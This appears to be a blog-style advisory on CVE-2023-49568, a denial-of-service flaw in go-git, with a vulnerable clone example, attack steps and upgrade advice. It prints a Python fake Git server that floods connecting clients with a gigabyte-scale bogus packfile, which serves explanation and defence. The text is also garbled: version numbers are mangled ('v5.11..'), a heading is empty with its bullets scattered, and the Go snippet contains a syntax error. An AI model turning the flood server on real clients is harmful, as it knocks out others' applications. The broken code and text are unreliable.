CVE CyberSecurity Database News

CVE-2023-49568 - DoS in go-git – All You Need to Know (with Code and Exploit Example)

Poster -

In December 2023, a denial of service (DoS) vulnerability was officially published under the identifier CVE-2023-49568. This bug affects versions of go-git before v5.11.. In this easy-to-understand read, I’ll break down what this issue is, show a code snippet, outline a simple exploitation scenario, and help you avoid getting hit yourself.

What Is go-git?

Before diving into the vulnerability, it helps to understand what go-git is. go-git is a popular pure Go implementation of Git. Many Go applications use it to read, write, and manage Git repositories programmatically without requiring the official git command line client.

What Is CVE-2023-49568?

In short, CVE-2023-49568 describes a weakness in go-git versions earlier than 5.11.. If a go-git client talks to a *malicious Git server*, it’s possible for that server to send back unexpected, “special” responses that tie up resources on the client side. This means that an attacker could intentionally crash or freeze applications built with go-git by simply getting them to fetch from their hostile server.

What’s vulnerable?

All go-git versions *before* 5.11

- Only when interacting with “real” filesystems (memory-only fs implementations are not affected)

Only if your app is using go-git as a client

What’s not vulnerable?

Why Does This Happen?

The root of the bug is *(simplified)*: go-git’s server response parsing logic doesn’t protect itself if the server sends a massive or malformed payload. Specifically, during large clone/fetch operations, the client may try to read a huge amount of data into memory or write gigantic objects to disk, leading to resource exhaustion.

If the attacker controls the server, it can intentionally send gigabytes of nonsense, causing the client to hang or even crash the machine.

Code Snippet – Vulnerable Usage

Here’s some real-world Go code, simplified, that would be vulnerable if it’s running go-git before 5.11:

package main

import (
    "log"
    "github.com/go-git/go-git/v5"
)

func main() {
    // WARNING! Cloning from an attacker-controlled URL below is dangerous
    _, err := git.PlainClone("/tmp/some-repo", false, &git.CloneOptions{
        URL: "https://malicious.example.com/fake-repo.git";, // Attacker's Git server
        Progress: nil,
    })
    if err != nil {
        log.Fatalf("Failed to clone: %v", err)
    }
}

If the attacker runs a custom Git server and feeds huge blobs, this code will quickly eat up RAM and CPU, and either get killed by the OS or hang indefinitely.

Attacker launches a fake Git server:

Builds a server (could be go-git based, or just a netcat session) that sends useless, oversized or infinite objects as a “repo”.

Victim app clones or fetches:

The vulnerable go-git app connects to that server—maybe it’s tricked with a malicious URL, supply chain attack, or “dependency confusion”.

Resource exhaustion happens:

The victim’s go-git code tries to buffer or write out the server’s huge data, blowing out RAM/disk, and possibly killing the process.

Exploit Demo: Custom Fake "billion-byte" Response

# Run this Python script as a fake git server
import socket

payload = b"000000cPACK" + b"A" * 1_500_000_000  # Make a fake huge Git packfile

server = socket.socket()
server.bind(("...", 9418))  # Standard Git port
server.listen(1)
print("Now listening. Connect from vulnerable go-git code...")

client, addr = server.accept()
print("Connection from", addr)
while True:
    # In a real PoC, first exchange some Git server handshake data
    client.sendall(payload)  # BAM—send gigabytes!

If you connect the Go code above (using go-git < v5.11) to git://<attacker-ip>, the process will very likely run out of memory or crash.

`sh

go get github.com/go-git/go-git/v5@latest

Use in-memory filesystems if possible:

If you don’t need to persist files, using go-git’s memory backend (memfs) mitigates the risk even in older versions.

References

- Official CVE bulletin
- go-git security advisory
- go-git release notes for v5.11

Only impacts “real” file operations (not full in-memory use)

- Upgrade go-git to 5.11.+ right away

Only the Go implementation is affected—not standard git CLI

Stay safe, patch up, and always treat remote servers with suspicion!

Timeline

Published on: 01/12/2024 11:15:12 UTC
Last modified on: 01/22/2024 17:57:41 UTC